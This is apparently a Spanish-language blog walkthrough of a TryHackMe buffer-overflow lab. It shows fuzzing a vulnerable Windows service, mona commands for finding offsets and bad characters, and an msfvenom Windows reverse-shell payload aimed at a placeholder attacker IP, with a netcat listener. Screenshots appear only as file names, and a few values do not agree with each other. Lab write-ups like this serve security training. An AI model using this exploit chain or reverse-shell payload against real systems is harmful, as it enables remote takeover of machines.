Estos son los pasos que seguimos en BufferOverflow1 de TryHackMe

Buscamos el archivo oscp.exe y corremos Immunity Debugger

Pasted image 20210614080457.png

nc 10.10.23.179 1337

Pasted image 20210614084622.png

Creamos y corremos un script llamado fuzzer.py

python3 fuzzer.py

Pasted image 20210614080623.png

Vemos que el ultimo numero de bytes que se enviaron fueron 1300.

/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 2400

El numero es mayor a 1300 y por eso usamos 1600. Esto genera un payload que lo copiamos al script en exploit.py

Pasted image 20210614080919.png

python3 exploit.py

Pasted image 20210614081823.png

En Immunity Debugger corremos lo siguiente

!mona config -set workingfolder c:\mona\%p

Pasted image 20210614133127.png

!mona findmsp -distance 2400

Pasted image 20210614144946.png

Pasted image 20210614145122.png

!mona bytearray -b "\x00"

Pasted image 20210614145535.png

Pasted image 20210614150113.png

!mona compare -f C:\mona\\oscp\bytearray.bin -a <address>

Pasted image 20210614150203.png

Pasted image 20210614150450.png

!mona bytearray -b "\x00\x07" Reiniciamos la aplicacion

Antes tenia el x07

Pasted image 20210614150658.png

Ahora le quitamos el x07

Pasted image 20210614150757.png

python3 exploit.py

Pasted image 20210614150113.png

!mona compare -f C:\mona\\oscp\bytearray.bin -a <address>

Pasted image 20210614151854.png

Pasted image 20210614152118.png

!mona bytearray -b \x00\x07\x2e\xa0"

Pasted image 20210614152422.png

Quitamos x2e y x0af

python3 exploit.py

!mona compare -f C:\mona\\oscp\bytearray.bin -a <address>

Pasted image 20210614154209.png

!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"

Hacemos esto con los caracteres malos que salieron Nos vamos a la ventana de logs

Pasted image 20210614155401.png

Pasted image 20210614165239.png

Modificamos el payload y retn

Reiniciamos la aplicacion

python3 exploit.py

msfvenom -p windows/shell\_reverse\_tcp LHOST=YOUR\_IP LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c

padding = "\x90" * 16

Cambiamos esto en el script

Pasted image 20210614165250.png

nc -lvnp 4444

blog

copyright©2022 Cu3rv0x all rights reserved